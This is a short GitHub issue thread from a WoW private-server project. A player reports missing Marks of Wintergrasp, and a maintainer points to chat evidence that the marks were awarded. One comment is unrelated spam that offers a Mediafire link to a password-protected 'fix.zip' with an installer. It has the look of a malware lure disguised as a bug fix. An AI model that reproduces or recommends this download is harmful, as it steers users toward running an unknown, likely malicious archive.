### ISSUE TITLE
Marks of Wintergrasp not awarded.

### ISSUE THREAD

**Issue by z0gra** [gamefreedomgit/Frostmourne#1685]
[//]: # (REMBEMBER! Add links to things related to the bug using for example:)
[//]: # (https://www.wowhead.com/wotlk)

**Description:**
I played and won WG today with my friend, we both had 7 marks of WG before we start the fight, after WG finished and alliance won, i noticed i still had 7 marks of WG while i asked my friend if he had same issue and he said he got awarded 5 marks so he has 12 marks, somehow the server didnt award me the marks of winter grasp

**How to reproduce:**

**How it should work:**

**Database links:**
https://trovo.live/s/Z0GRA/549782627607?vid=lc-1397757891642429582&adtag=user.GreekDemoMaN_TV.clip

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Riztazz** [comment]
Yes you did, i can see it on the chat at exactly 0:19 timer, the green text:
![image](https://github.com/user-attachments/assets/cd9b47bf-9d86-4127-94e3-342ef8f45a62)
